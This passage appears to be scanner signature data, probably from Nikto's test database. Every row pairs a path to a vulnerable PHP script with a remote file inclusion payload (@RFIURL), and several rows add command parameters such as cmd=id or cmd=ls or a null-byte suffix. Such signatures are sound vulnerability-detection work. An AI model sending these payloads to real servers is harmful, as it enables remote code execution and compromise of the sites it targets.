"005438","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/newusergreatings/pm_newreg.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005439","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/organizations/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005440","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/phones/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005441","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/pms/index.php?module_path=@RFIURL???","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005442","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005443","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005444","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005445","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/presence/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005446","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/projects/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005447","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/projects/list.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005448","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/projects/summary.inc.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005449","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/punish/p_error.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005450","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/punish/profile.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005451","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/reports/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005452","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/search/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005453","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005454","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005455","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/settings/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005456","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/snf/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005457","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/syslog/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005458","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/tasks/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005459","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/tasks/searchsimilar.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005460","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/tasks/summary.inc.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005461","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/threadstop/threadstop.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005462","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005463","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/tml/block.tag.php?GLOBALS[PTH][classes]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005464","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005465","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/useradm/index.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005466","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/users/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005467","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/vWar_Account/includes/functions_common.php?vwar_root2=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005468","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/visitors2/include/config.inc.php?lvc_include_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005469","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005470","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005471","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/xfsection/modify.php?dir_module=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005472","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005473","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005474","https://gist.github.com/mubix/5d269c686584875015a2","c","/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005475","https://gist.github.com/mubix/5d269c686584875015a2","c","/modulistica/mdl_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005476","https://gist.github.com/mubix/5d269c686584875015a2","c","/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005477","https://gist.github.com/mubix/5d269c686584875015a2","c","/moodle/admin/utfdbmigrate.php?cmd=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005478","https://gist.github.com/mubix/5d269c686584875015a2","c","/moosegallery/display.php?type=@RFIURL?&cmd=[command]","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005479","https://gist.github.com/mubix/5d269c686584875015a2","c","/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005480","https://gist.github.com/mubix/5d269c686584875015a2","c","/moteur/moteur.php?chemin=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005481","https://gist.github.com/mubix/5d269c686584875015a2","c","/movie_cls.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005482","https://gist.github.com/mubix/5d269c686584875015a2","c","/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005483","https://gist.github.com/mubix/5d269c686584875015a2","c","/music/buycd.php?HTTP_DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005484","https://gist.github.com/mubix/5d269c686584875015a2","c","/mutant_includes/mutant_functions.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005485","https://gist.github.com/mubix/5d269c686584875015a2","c","/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005486","https://gist.github.com/mubix/5d269c686584875015a2","c","/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005487","https://gist.github.com/mubix/5d269c686584875015a2","c","/mygallery/myfunctions/mygallerybrowser.php?myPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005488","https://gist.github.com/mubix/5d269c686584875015a2","c","/myphpcommander_path/system/lib/package.php?gl_root=@RFIURL?cmd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005489","https://gist.github.com/mubix/5d269c686584875015a2","c","/mysave.php?file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005490","https://gist.github.com/mubix/5d269c686584875015a2","c","/naboard_pnr.php?skin=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005491","https://gist.github.com/mubix/5d269c686584875015a2","c","/ncaster/admin/addons/archive/archive.php?adminfolder=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005492","https://gist.github.com/mubix/5d269c686584875015a2","c","/network_module_selector.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005493","https://gist.github.com/mubix/5d269c686584875015a2","c","/news.php?CONFIG[script_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005494","https://gist.github.com/mubix/5d269c686584875015a2","c","/news.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005495","https://gist.github.com/mubix/5d269c686584875015a2","c","/news.php?scriptpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005496","https://gist.github.com/mubix/5d269c686584875015a2","c","/news.php?vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005497","https://gist.github.com/mubix/5d269c686584875015a2","c","/news.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005498","https://gist.github.com/mubix/5d269c686584875015a2","c","/news/include/createdb.php?langfile;=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005499","https://gist.github.com/mubix/5d269c686584875015a2","c","/news/include/customize.php?l=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005500","https://gist.github.com/mubix/5d269c686584875015a2","c","/news/newstopic_inc.php?indir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005501","https://gist.github.com/mubix/5d269c686584875015a2","c","/news/scripts/news_page.php?script_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005502","https://gist.github.com/mubix/5d269c686584875015a2","c","/newsadmin.php?action=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005503","https://gist.github.com/mubix/5d269c686584875015a2","c","/newsarchive.php?path_to_script=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005504","https://gist.github.com/mubix/5d269c686584875015a2","c","/newsfeeds/includes/aggregator.php?zf_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005505","https://gist.github.com/mubix/5d269c686584875015a2","c","/newsfeeds/includes/controller.php?zf_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005506","https://gist.github.com/mubix/5d269c686584875015a2","c","/newsletter/newsletter.php?waroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005507","https://gist.github.com/mubix/5d269c686584875015a2","c","/newsp/lib/class.Database.php?path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005508","https://gist.github.com/mubix/5d269c686584875015a2","c","/newticket.php?lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005509","https://gist.github.com/mubix/5d269c686584875015a2","c","/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005510","https://gist.github.com/mubix/5d269c686584875015a2","c","/noticias.php?inc=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005511","https://gist.github.com/mubix/5d269c686584875015a2","c","/nucleus/plugins/skinfiles/index.php?DIR_LIBS=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005512","https://gist.github.com/mubix/5d269c686584875015a2","c","/nuke_path/iframe.php?file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005513","https://gist.github.com/mubix/5d269c686584875015a2","c","/nukebrowser.php?filnavn=@RFIURL&filhead=XXpathXX&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005514","https://gist.github.com/mubix/5d269c686584875015a2","c","/nuseo/admin/nuseo_admin_d.php?nuseo_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005515","https://gist.github.com/mubix/5d269c686584875015a2","c","/nuseo/admin/nuseo_admin_d.php?nuseo_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005516","https://gist.github.com/mubix/5d269c686584875015a2","c","/oaboard_en/forum.php?inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005517","https://gist.github.com/mubix/5d269c686584875015a2","c","/ocp-103/index.php?req_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005518","https://gist.github.com/mubix/5d269c686584875015a2","c","/ocs/include/footer.inc.php?fullpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005519","https://gist.github.com/mubix/5d269c686584875015a2","c","/ocs/include/theme.inc.php?fullpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005520","https://gist.github.com/mubix/5d269c686584875015a2","c","/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005521","https://gist.github.com/mubix/5d269c686584875015a2","c","/olbookmarks-0.7.4/themes/test1.php?@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005522","https://gist.github.com/mubix/5d269c686584875015a2","c","/oneadmin/adminfoot.php?path[docroot]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005523","https://gist.github.com/mubix/5d269c686584875015a2","c","/oneadmin/blogger/sampleblogger.php?path[docroot]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005524","https://gist.github.com/mubix/5d269c686584875015a2","c","/oneadmin/config-bak.php?include_once=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005525","https://gist.github.com/mubix/5d269c686584875015a2","c","/oneadmin/config.php?path[docroot]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005526","https://gist.github.com/mubix/5d269c686584875015a2","c","/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005527","https://gist.github.com/mubix/5d269c686584875015a2","c","/online.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005528","https://gist.github.com/mubix/5d269c686584875015a2","c","/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005529","https://gist.github.com/mubix/5d269c686584875015a2","c","/openi-admin/base/fileloader.php?config[openi_dir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005530","https://gist.github.com/mubix/5d269c686584875015a2","c","/openrat/themes/default/include/html/insert.inc.php?tpl_dir=@RFIURL???","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005531","https://gist.github.com/mubix/5d269c686584875015a2","c","/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005532","https://gist.github.com/mubix/5d269c686584875015a2","c","/ops/gals.php?news_file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005533","https://gist.github.com/mubix/5d269c686584875015a2","c","/order/login.php?svr_rootscript=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005534","https://gist.github.com/mubix/5d269c686584875015a2","c","/osData/php121/php121db.php?php121dir=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005535","https://gist.github.com/mubix/5d269c686584875015a2","c","/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005536","https://gist.github.com/mubix/5d269c686584875015a2","c","/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005537","https://gist.github.com/mubix/5d269c686584875015a2","c","/owimg.php3?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005538","https://gist.github.com/mubix/5d269c686584875015a2","c","/p-news.php?pn_lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005539","https://gist.github.com/mubix/5d269c686584875015a2","c","/pafiledb/includes/pafiledb_constants.php?module_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005540","https://gist.github.com/mubix/5d269c686584875015a2","c","/page.php?goto=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005541","https://gist.github.com/mubix/5d269c686584875015a2","c","/page.php?id=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005542","https://gist.github.com/mubix/5d269c686584875015a2","c","/panel/common/theme/default/header_setup.php?path[docroot]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005543","https://gist.github.com/mubix/5d269c686584875015a2","c","/param_editor.php?folder=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005544","https://gist.github.com/mubix/5d269c686584875015a2","c","/parse/parser.php?WN_BASEDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005545","https://gist.github.com/mubix/5d269c686584875015a2","c","/patch/?language_id=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005546","https://gist.github.com/mubix/5d269c686584875015a2","c","/patch/tools/send_reminders.php?noSet=0&includedir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005547","https://gist.github.com/mubix/5d269c686584875015a2","c","/paypalipn/ipnprocess.php?INC=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005548","https://gist.github.com/mubix/5d269c686584875015a2","c","/pda/pda_projects.php?offset=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005549","https://gist.github.com/mubix/5d269c686584875015a2","c","/phfito/phfito-post?SRC_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005550","https://gist.github.com/mubix/5d269c686584875015a2","c","/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005551","https://gist.github.com/mubix/5d269c686584875015a2","c","/photo_comment.php?toroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005552","https://gist.github.com/mubix/5d269c686584875015a2","c","/php-inc/log.inc.php?SKIN_URL=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005553","https://gist.github.com/mubix/5d269c686584875015a2","c","/php-include-robotsservices.php?page=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005554","https://gist.github.com/mubix/5d269c686584875015a2","c","/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005555","https://gist.github.com/mubix/5d269c686584875015a2","c","/php.incs/common.inc.php?cm_basedir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005556","https://gist.github.com/mubix/5d269c686584875015a2","c","/php/init.gallery.php?include_class=@RFIURL/something","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005557","https://gist.github.com/mubix/5d269c686584875015a2","c","/php121db.php?php121dir=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005558","https://gist.github.com/mubix/5d269c686584875015a2","c","/php4you.php?dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005559","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005560","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpBB2/shoutbox.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005561","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpCards.header.php?CardPath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005562","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005563","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpMyChat.php3?=@RFIURL?cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005564","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005565","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005566","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005567","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpbb/sendmsg.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005568","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpcalendar/includes/calendar.php?phpc_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005569","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpcalendar/includes/setup.php?phpc_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005570","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpdebug_PATH/test/debug_test.php?debugClassLocation=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005571","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005572","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005573","https://gist.github.com/mubix/5d269c686584875015a2","c","/phphd_downloads/common.php?phphd_real_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005574","https://gist.github.com/mubix/5d269c686584875015a2","c","/phphost_directoryv2/include/admin.php?rd=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005575","https://gist.github.com/mubix/5d269c686584875015a2","c","/phphtml.php?htmlclass_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005576","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpi/edit_top_feature.php?include_connection=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005577","https://gist.github.com/mubix/5d269c686584875015a2","c","/phpi/edit_topics_feature.php?include_connection=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005578","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/site_conf.php?ordnertiefe=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005579","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005580","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005581","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005582","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005583","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005584","https://gist.github.com/mubix/5d269c686584875015a2","c","/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 